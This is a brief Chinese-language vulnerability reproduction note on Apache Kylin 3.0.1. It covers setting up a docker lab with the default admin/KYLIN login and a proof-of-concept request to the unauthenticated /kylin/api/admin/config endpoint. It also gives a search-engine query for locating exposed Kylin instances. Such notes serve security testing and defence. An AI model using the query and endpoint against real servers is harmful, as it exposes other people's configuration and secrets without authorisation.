Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息
app="APACHE-kylin"
docker pull apachekylin/apache-kylin-standalone:3.0.1
docker run -d \\
-m 8G \\
-p 7070:7070 \\
-p 8088:8088 \\
-p 50070:50070 \\
-p 8032:8032 \\
-p 8042:8042 \\
-p 16010:16010 \\
apachekylin/apache-kylin-standalone:3.0.1
打开后使用默认账号密码admin/KYLIN登录,出现初始界面即为成功
image-20220525161044773
漏洞验证POC
/kylin/api/admin/config
image-20220525161140820